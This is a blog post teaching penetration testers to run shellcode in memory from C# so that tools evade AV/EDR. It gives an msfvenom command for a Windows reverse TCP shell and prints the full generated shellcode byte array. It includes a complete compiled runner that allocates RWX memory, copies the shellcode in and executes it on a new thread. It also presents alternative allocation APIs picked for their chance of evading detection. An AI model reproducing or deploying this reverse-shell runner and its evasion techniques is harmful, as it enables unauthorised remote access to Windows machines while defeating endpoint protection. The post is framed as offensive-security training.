Introduction to C# for penetration testers: Section 1 Running stuff in memory, Part 1 Shellcode
This is the first post in a blog series on using C# for offensive security, with a particular focus on penetration testers. For the first topic, I will focus on what is possibly the most useful task for penetration testers: getting other people’s tools and scripts past AV/EDR.
Why?
So many amazing tools and exploits are constantly being developed (and have existed for a long time) that we as pentesters can, and do, use on a daily basis. Re-developing these tools from scratch takes time and effort that is simply not feasible on an engagement. Because of this, being able to take other people’s tools and wrap them in custom AV/EDR bypass methods lets a pentester quickly whip up a version of a tool that does not get caught by Anti-Virus (AV), and that can be executed when an application whitelist is bypassed (looking at you, MSBuild).
Ok, but why C#?
C# is a high-level language, which makes it quick and relatively easy to develop and modify. It runs on the powerful .NET Common Language Runtime (CLR), which gives access to both the native and Win32 APIs. This gives C# the ability to perform very useful tasks, such as running shellcode in memory, running Portable Executables and token manipulation, just to name a few. This means that, for a penetration tester, C# is a language that can be written, modified and deployed relatively easily during engagements, requiring hours instead of days to develop.
C# vs .NET vs CLR vs …
Often .NET and C# are used interchangeably, but they are not the same thing. C# is a programming language that uses the .NET Framework, and the resulting code is run within the Common Language Runtime. The code that runs in the Common Language Runtime is called Microsoft Intermediate Language (MSIL). It is the CLR’s responsibility to convert this Intermediate Language into native code (via the Just In Time (JIT) compiler), which in turn is what is actually run by the Operating System.
Multiple programming languages exist that use the .NET Framework and CLR, including VB.NET, a variation of C++ (C++/CLI), IronPython and PowerShell. Whilst not an exact analogy, this is a similar concept to Java being compiled to byte code that is in turn run on the Java Virtual Machine (JVM).
The image below gives a visual diagram of the differences.

What this means is that when we run a program developed in C# (a .NET assembly, sometimes called managed code), what we can and cannot do is restricted by the capabilities the CLR we run within provides to us. This becomes important when discussing AV/EDR bypassing.
Running stuff in memory
The first important concept to cover is running stuff in memory. Long gone are the times when you could simply drop some Metasploit-generated executable on disk and not expect every single Anti-Virus in existence to nuke it off the face of the Earth. For us, this means we can’t directly drop generated exes or payload files to disk, as they will immediately (well, should) get flagged and be useless to us.
In comes the concept of running payloads in memory. This allows us to hopefully defeat static analysis performed by Anti-Virus by finding tricky ways to encrypt and run payloads dynamically, significantly reducing the chances of our payloads getting caught.
Running shellcode in memory via Win32 API’s
The first thing we will run in memory is shellcode. If you don’t know, shellcode can generally be thought of as “malicious” native code: pure native code that, if run directly, will do some bad thing. Originally this code would provide a shell, hence the term shellcode, but it can now mean much more.
Running shellcode in memory is a very well studied and well known topic. Here we will only be discussing “self” injection methods, that is, running shellcode within the same process, i.e. ours. In general, the steps to execute position-independent shellcode are:
- Allocate memory for the shellcode (usually with Write/Execute permissions).
- Write the shellcode to the newly allocated memory.
- Execute the shellcode.
- Profit 😊
So how do we actually do this in C#? To do this we will use the Win32 API, the native API and/or built-in .NET functionality. The Win32 API is an API written in C and developed by Microsoft for developers of Windows applications to interact with the Windows Operating System. It allows applications running in user mode to perform actions such as listing files in directories, obtaining handles to access tokens, allocating memory, etc.
The native API is also written in C and developed by Microsoft, but it is not intended to be used directly by developers. These APIs are responsible for switching from user to kernel mode and actually making the syscalls. They are mostly not officially documented (unlike the Win32 API), but are called by the Win32 API. You can think of the Win32 API as the layer that does validation checks and is easier to use than the native API, whilst the native API is responsible for getting the action performed on the kernel side of things. Most of the time we will be using the Win32 API. @YUVAL0X92 has a good blog showing the differences between the two here.
But C# runs within the CLR, and the Win32 API is compiled C code (i.e. unmanaged code) shipped as Dynamic Link Libraries (DLLs), so how do we run functions defined in the Win32 API? Luckily the CLR has a feature that can be leveraged to perform such a task, called Platform Invoke (shortened to PInvoke).
This is an API that allows managed code to specify the location of an unmanaged library together with a function definition (termed a prototype) containing the function’s name, input parameters and return type. A lot of C data types do not directly exist in C#/.NET, and part of PInvoke’s job is to handle the translation between the C# data type and the actual data type required for the Win32 API call.
How do we actually use this? First we need to include the namespace (can be thought of as a “package”) that contains the PInvoke API (System.Runtime.InteropServices), then add the DllImport attribute and the function prototype (with the C data types written as their .NET equivalents).
But how do we know which C data types correspond to which data types in .NET? There’s no official catalogue of ready-made C# signatures for every Win32 function, but the site pinvoke.net has a collection of common Win32 API function prototypes for use in C#, so this is a great resource if you get stuck.
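To make the PInvoke mechanics concrete before we get to the real thing, here is a minimal and deliberately harmless sketch. It imports GetCurrentProcessId from kernel32.dll (C prototype: DWORD GetCurrentProcessId(void)) and compares the result with what .NET reports. The class and helper names (PInvokeDemo, NativePid, IsWindows) are made up for illustration, and the platform check is only there so the program exits cleanly on a non-Windows runtime.

```csharp
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

public static class PInvokeDemo
{
    // C prototype: DWORD GetCurrentProcessId(void);
    // DWORD is an unsigned 32-bit integer, so it is declared as uint in C#.
    [DllImport("kernel32.dll")]
    private static extern uint GetCurrentProcessId();

    // Hypothetical helper: kernel32.dll only exists on Windows.
    public static bool IsWindows()
    {
        return Environment.OSVersion.Platform == PlatformID.Win32NT;
    }

    // Hypothetical wrapper so callers never touch the extern directly.
    public static uint NativePid()
    {
        return GetCurrentProcessId();
    }

    public static void Main()
    {
        if (!IsWindows())
        {
            Console.WriteLine("kernel32.dll is only available on Windows, skipping.");
            return;
        }
        // Both values should be the same process ID.
        Console.WriteLine("PID via PInvoke: {0}", NativePid());
        Console.WriteLine("PID via .NET:    {0}", Process.GetCurrentProcess().Id);
    }
}
```

The pattern is always the same: find the C prototype, map each C type to a .NET type, and put the result under a DllImport attribute naming the DLL.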
POC Code
OK, so enough talking, time for some code.
For the first example, we will use the VirtualAlloc Win32 API for the allocation of memory, Marshal.Copy .NET method for writing to this allocated memory, and CreateThread Win32 API to make a new thread that in turn will execute the memory we have allocated.
Firstly we will create some shellcode using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.105 LPORT=1337 -f csharp -v shellCode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of csharp file: 2368 bytes
byte[] shellCode = new byte[460] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,
0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x05,0x39,0xc0,0xa8,0x38,0x69,0x41,0x54,
0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,
0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,
0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,
0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,
0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,
0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,
0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,
0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,
0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,
0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,0xba,0x08,0x87,0x1d,0x60,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5 };
This is then used within a C Sharp file that executes the shellcode.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace ShellCodeRunner {
    public class Program {
        // Win32 API imports (P/Invoke) from kernel32.dll
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        [DllImport("kernel32")]
        private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        // Allocation type and memory protection constants passed to VirtualAlloc
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        static void Main(string[] args)
        {
byte[] shellCode = new byte[460] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,
0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x05,0x39,0xc0,0xa8,0x38,0x69,0x41,0x54,
0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,
0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,
0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,
0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,
0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,
0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,
0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,
0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,
0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,
0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,0xba,0x08,0x87,0x1d,0x60,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5 };
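            // Step 1: allocate RWX memory large enough for the shellcode
            IntPtr rwxMemory = VirtualAlloc(IntPtr.Zero, (uint)shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            // Step 2: copy the shellcode from the managed array into the unmanaged allocation
            Marshal.Copy(shellCode, 0, rwxMemory, shellCode.Length);
            // Step 3: start a new thread at the copied shellcode
            IntPtr shellCodeThread = CreateThread(IntPtr.Zero, 0, rwxMemory, IntPtr.Zero, 0, IntPtr.Zero);
            // Block until the thread exits (0xFFFFFFFF = INFINITE) so the process stays alive
            WaitForSingleObject(shellCodeThread, 0xFFFFFFFF);
        }
    }
}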
You can use either Visual Studio or csc.exe to compile the file. Assuming it’s saved as Program.cs, run the following to compile it to Program.exe:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Program.cs
Microsoft (R) Visual C# Compiler version 4.8.4084.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
Then when run with msfconsole set up, a shell is caught :)


What is this?
We first start by importing the Win32 API functions we want using the DllImport attribute, the part of PInvoke that imports specific functions from specific DLLs. Specifically, with the first DllImport we say: from kernel32.dll, import the function named CreateThread, which returns an IntPtr (a pointer-sized integer) and takes an IntPtr, an unsigned 32-bit int, an IntPtr, an IntPtr, an unsigned 32-bit int and another IntPtr as arguments. If we look at the official documentation for the prototype of CreateThread, we will see that this isn’t exactly the same:
HANDLE CreateThread(
[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,
[in] SIZE_T dwStackSize,
[in] LPTHREAD_START_ROUTINE lpStartAddress,
[in, optional] __drv_aliasesMem LPVOID lpParameter,
[in] DWORD dwCreationFlags,
[out, optional] LPDWORD lpThreadId
);
As you can see, the data types from the official prototype are different to the one we are using. This is in part the magic that PInvoke performs. We use pinvoke.net to find the actual prototype we need to use here.
We repeat this import/translation process for WaitForSingleObject and VirtualAlloc Win32 API’s.
Within the program’s main method, we start by declaring a byte array that contains our shellcode we want to execute (coming from msfvenom).
Next we allocate RWX (Read, Write, Execute) process memory using the VirtualAlloc Win32 API call. The first argument to this call is the start address we want for the memory; in our case we don’t care, so we pass it a zero pointer. With the next argument we specify how much memory we want to allocate. VirtualAlloc works in pages, so we are saying we want at least the size of the shellcode allocated. The third argument says we want the memory to be committed, meaning we want it to actually be backed by storage (as opposed to only “reserving” a range of virtual addresses). This argument is a DWORD flag, where the values can be found here. We store this value as an unsigned integer in a variable called MEM_COMMIT. Similarly, we specify the memory protection of the requested memory to be PAGE_EXECUTE_READWRITE (0x40), using the common memory protection constants located here. This specifies that the memory can be read, written to and executed from. The return value of this call is the address (as an IntPtr) of the newly allocated memory.
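Since VirtualAlloc works in pages, a request for 460 bytes is rounded up to a whole page. The arithmetic behind that rounding can be sketched as below. RoundUpToPage is a hypothetical helper written for this post, not a Windows API, and the 4096-byte page size in the fixed examples is an assumption (it is the usual value on x86/x64, and Environment.SystemPageSize reports the real one).

```csharp
using System;

public static class PageMath
{
    // Hypothetical helper: round size up to the next multiple of pageSize.
    public static long RoundUpToPage(long size, long pageSize)
    {
        return ((size + pageSize - 1) / pageSize) * pageSize;
    }

    public static void Main()
    {
        // The page size of the machine we are actually running on.
        long pageSize = Environment.SystemPageSize;
        Console.WriteLine("System page size: {0} bytes", pageSize);
        Console.WriteLine("460 bytes rounds up to {0} bytes", RoundUpToPage(460, pageSize));

        // Fixed examples, assuming 4096-byte pages.
        Console.WriteLine(RoundUpToPage(460, 4096));   // prints 4096
        Console.WriteLine(RoundUpToPage(4097, 4096));  // prints 8192
    }
}
```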
Next we use the .NET Marshal.Copy method (located within the System.Runtime.InteropServices namespace). Marshal has a bunch of useful methods for moving data between managed and unmanaged code. This method copies data from a managed array to an unmanaged section of memory (i.e. the type we allocated). Here we copy the shellCode byte array (first argument), starting at the first index of the array (0) (second argument), specifying the destination address (the newly allocated memory) and the amount of data to copy (the length of the shellCode array).
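If you want to get a feel for Marshal.Copy on its own, the sketch below copies a harmless byte array into ordinary (non-executable) unmanaged memory obtained from Marshal.AllocHGlobal, then copies it back out with the reverse overload. The class and method names (MarshalCopyDemo, RoundTrip) are made up for illustration, and AllocHGlobal is swapped in here purely so the example is safe to run anywhere.

```csharp
using System;
using System.Runtime.InteropServices;

public static class MarshalCopyDemo
{
    // Hypothetical helper: managed array -> unmanaged buffer -> new managed array.
    public static byte[] RoundTrip(byte[] source)
    {
        // Plain unmanaged heap memory (read/write, not executable).
        IntPtr unmanaged = Marshal.AllocHGlobal(source.Length);
        try
        {
            // Managed -> unmanaged: (source array, start index, destination, length).
            Marshal.Copy(source, 0, unmanaged, source.Length);

            // Unmanaged -> managed: (source pointer, destination array, start index, length).
            byte[] copy = new byte[source.Length];
            Marshal.Copy(unmanaged, copy, 0, copy.Length);
            return copy;
        }
        finally
        {
            // Unmanaged memory is not garbage collected, so free it ourselves.
            Marshal.FreeHGlobal(unmanaged);
        }
    }

    public static void Main()
    {
        byte[] data = { 0x01, 0x02, 0x03, 0x04 };
        byte[] copy = RoundTrip(data);
        Console.WriteLine(BitConverter.ToString(copy)); // prints 01-02-03-04
    }
}
```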
Next we use the Win32 API CreateThread to create a new thread to run the shellcode. The first argument is a pointer to a SECURITY_ATTRIBUTES structure, which states whether a child process can inherit (use) the returned handle to the new thread. We don’t really care, so for simplicity we pass it “NULL”, which is IntPtr.Zero. The second argument specifies the size of the stack to use; we again don’t care and just want the default set for this executable (hence we pass 0). The third argument is the start address of the code we want this thread to run. In this case we want it to run the shellcode written to the RWX memory, so we pass that address. The next argument is the parameter to pass along to the code being run. We aren’t passing one, so we again pass “NULL”, being IntPtr.Zero. We specify the creation flags as “0”, which means the thread runs immediately after it’s created (the other flags can be found here). The final argument is an optional pointer to a variable that receives the new thread’s ID. We don’t need it, so again we pass NULL (IntPtr.Zero).
When this line is run, we obtain a handle to the newly created thread, and the thread starts running our shellcode. However this isn’t a blocking call: by default the program won’t wait for the thread to finish, and will instead reach the end of Main and terminate the process (including this thread) almost immediately.
To stop this, we use the Win32 API WaitForSingleObject to make the calling thread wait for the new thread to become “signaled”, effectively halting execution (and therefore termination) until the thread finishes (a thread object becomes signaled when it terminates). The first argument to this function is a handle to the object to “wait” for; in our case we want the newly created thread running our shellcode, so we pass the return value from CreateThread. The second argument is the number of milliseconds to wait (after which execution will continue anyway). Since we don’t want a timeout, we pass the special value INFINITE (0xFFFFFFFF), which means wait until the object is signaled.
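To see what “signaled” and the timeout argument mean in practice, here is a small harmless sketch that waits on a managed ManualResetEvent through the same Win32 call. The class and method names (WaitDemo, WaitTwice) are invented for this example; the constants are the documented WAIT_OBJECT_0, WAIT_TIMEOUT and INFINITE values. It needs Windows, so it bails out elsewhere.

```csharp
using System;
using System.Runtime.InteropServices;
using System.Threading;

public static class WaitDemo
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    public const uint WAIT_OBJECT_0 = 0x00000000; // the object was signaled
    public const uint WAIT_TIMEOUT = 0x00000102;  // the timeout elapsed first
    public const uint INFINITE = 0xFFFFFFFF;      // no timeout at all

    // Hypothetical helper: wait once before and once after signaling an event.
    public static uint[] WaitTwice()
    {
        using (ManualResetEvent evt = new ManualResetEvent(false))
        {
            IntPtr handle = evt.SafeWaitHandle.DangerousGetHandle();
            // Not signaled yet, so this gives up after 100 ms.
            uint before = WaitForSingleObject(handle, 100);
            evt.Set();
            // Already signaled, so even an INFINITE wait returns straight away.
            uint after = WaitForSingleObject(handle, INFINITE);
            return new uint[] { before, after };
        }
    }

    public static void Main()
    {
        if (Environment.OSVersion.Platform != PlatformID.Win32NT)
        {
            Console.WriteLine("kernel32.dll is only available on Windows, skipping.");
            return;
        }
        uint[] results = WaitTwice();
        Console.WriteLine("Before Set(): 0x{0:X}", results[0]); // WAIT_TIMEOUT
        Console.WriteLine("After Set():  0x{0:X}", results[1]); // WAIT_OBJECT_0
    }
}
```

Checking the return value like this is also a cheap way to tell whether a wait ended because the object was signaled or because the timeout ran out.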
Variations of this
This is only one example of steps 1, 2 and 3 for running shellcode in memory. Below I will cover some different API calls that can be used for each of the three steps.
Part 1 - RWX Memory
VirtualAllocEx
Very similar to VirtualAlloc, the VirtualAllocEx Win32 API allocates memory, but allows you to specify the process we want to do this for. The P/Invoke signature for this is:
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
In comparison to VirtualAlloc, the only additional parameter is the first one, a handle (IntPtr) to the process we want to allocate memory in. We can obtain a handle to our own process using the GetCurrentProcess Win32 API, which does exactly what it says: it returns a (pseudo) handle to the current process. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
These two APIs can then be used like so (note the cast, as dwSize is declared as a uint):
IntPtr rwxMemory = VirtualAllocEx(GetCurrentProcess(), IntPtr.Zero, (uint)shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
VirtualAllocExNuma
VirtualAllocExNuma is a variation of VirtualAllocEx that allows you to specify the NUMA node (in simple terms a NUMA node is a CPU + memory, so two CPU’s with their own local memory would be two separate NUMA nodes, but if they share the same local memory, they are one NUMA node). The P/Invoke signature for this is:
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
The only additional parameter here is the last one, nndPreferred. This allows us to specify which NUMA node to try and allocate memory on. For our purposes, we don’t really care so we can just pass it the first node (0).
IntPtr rwxMemory = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, (uint)shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0);
You might ask, why would we bother doing this? Isn’t it the same as VirtualAllocEx in this case? Yes it is, but it is less commonly used, meaning it might bypass AV/EDR checks simply by being a rarely used API.
NtCreateSection/NtMapViewOfSection
The NtCreateSection API can be used to create a Section within a process. What’s a section? A section is a special block of memory that is made to be shared between processes. A process can create a section, that can be mapped by other processes (or this one), and data written to the section can be read by any other process that has mapped the section.
This allows us to create a section, then map it into our process’s virtual address space with RWX permissions, and use this to store and run our shellcode.
The P/Invoke signature for NtCreateSection is:
[DllImport("ntdll.dll")]
public static extern UInt32 NtCreateSection(ref IntPtr section,UInt32 desiredAccess,IntPtr pAttrs,ref long MaxSize,uint pageProt,uint allocationAttribs,IntPtr hFile);
The first argument is a pointer to a handle (represented as a ref IntPtr) that will be populated with a handle to the newly created section. The second argument specifies what types of access may be used when this section is mapped by a call to NtMapViewOfSection. This allows us to say, for example, that this section can’t be mapped with execute permissions but only read permissions, or that it can be mapped with any access (RWX). In our case we want to be able to map the section into our process with RWX permissions, so we use the SECTION_ALL_ACCESS value, which includes SECTION_MAP_WRITE (0x0002), SECTION_MAP_READ (0x0004) and SECTION_MAP_EXECUTE (0x0008). These values are constants that can be found here.
The next argument is a pointer to an OBJECT_ATTRIBUTES structure, which allows you to set certain properties of the object (in this case the section) when it’s created, for example its root directory and its security descriptor. This is an optional argument, and we don’t need to use any of these, so we pass a NULL pointer (IntPtr.Zero).
The next argument is a pointer to a LARGE_INTEGER (in C#, this is a long) that specifies the maximum size (in bytes) of the section. We only need this to be the size of the shellcode, so we set the maximum to the size of the shellcode array. The fifth argument is the memory protection to apply to the pages allocated for the section. We want to be able to give RWX permissions, so we set this to PAGE_EXECUTE_READWRITE (the same value as for VirtualAlloc).
The sixth argument states whether the memory allocated for the section should be committed or reserved (similarly to VirtualAlloc). We want it to be committed, so we use the SEC_COMMIT (0x08000000) value.
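The access values are just bit flags that get OR’d together, which is easy to see if we write them as a [Flags] enum. The sketch below uses the values from the Windows SDK headers; note that SECTION_ALL_ACCESS there also includes SECTION_QUERY, SECTION_EXTEND_SIZE and STANDARD_RIGHTS_REQUIRED on top of the three map flags. The enum name SectionAccess and the class name are my own choices for illustration.

```csharp
using System;

[Flags]
public enum SectionAccess : uint
{
    SECTION_QUERY = 0x0001,
    SECTION_MAP_WRITE = 0x0002,
    SECTION_MAP_READ = 0x0004,
    SECTION_MAP_EXECUTE = 0x0008,
    SECTION_EXTEND_SIZE = 0x0010,
    STANDARD_RIGHTS_REQUIRED = 0x000F0000,
    // Every right above OR'd together.
    SECTION_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SECTION_QUERY | SECTION_MAP_WRITE
                         | SECTION_MAP_READ | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE
}

public static class SectionAccessDemo
{
    public static void Main()
    {
        // Only the three map rights: read, write and execute.
        SectionAccess rwx = SectionAccess.SECTION_MAP_READ
                            | SectionAccess.SECTION_MAP_WRITE
                            | SectionAccess.SECTION_MAP_EXECUTE;
        Console.WriteLine("RWX only:   0x{0:X}", (uint)rwx);                              // prints 0xE
        Console.WriteLine("ALL_ACCESS: 0x{0:X}", (uint)SectionAccess.SECTION_ALL_ACCESS); // prints 0xF001F

        // ALL_ACCESS is a superset of the RWX map rights.
        Console.WriteLine(SectionAccess.SECTION_ALL_ACCESS.HasFlag(rwx)); // prints True
    }
}
```

Passing the narrower RWX-only combination should also be enough for mapping, but I have stuck with SECTION_ALL_ACCESS in the main text for simplicity.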
The final argument is an optional file handle. This allows the section to be created against a specific file, or if set to NULL, then it will be created using the paging file. Since we are happy to use the default, we pass in NULL (IntPtr.Zero).
The below code will create the section by calling NtCreateSection function:
IntPtr sectionHandle = IntPtr.Zero;
long sizeLong = Convert.ToInt64(shellCode.Length);
NtCreateSection(ref sectionHandle, SECTION_ALL_ACCESS, IntPtr.Zero, ref sizeLong, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero);
With the section created, we can now map it into this process’s virtual address space with RWX permissions. The mapping is done using the NtMapViewOfSection API call. The P/Invoke signature for this function is:
[DllImport("ntdll.dll")]
public static extern UInt32 NtMapViewOfSection(IntPtr SectionHandle,IntPtr ProcessHandle,ref IntPtr BaseAddress,IntPtr ZeroBits,IntPtr CommitSize,ref long SectionOffset,ref long ViewSize,uint InheritDisposition,uint AllocationType,uint Win32Protect);
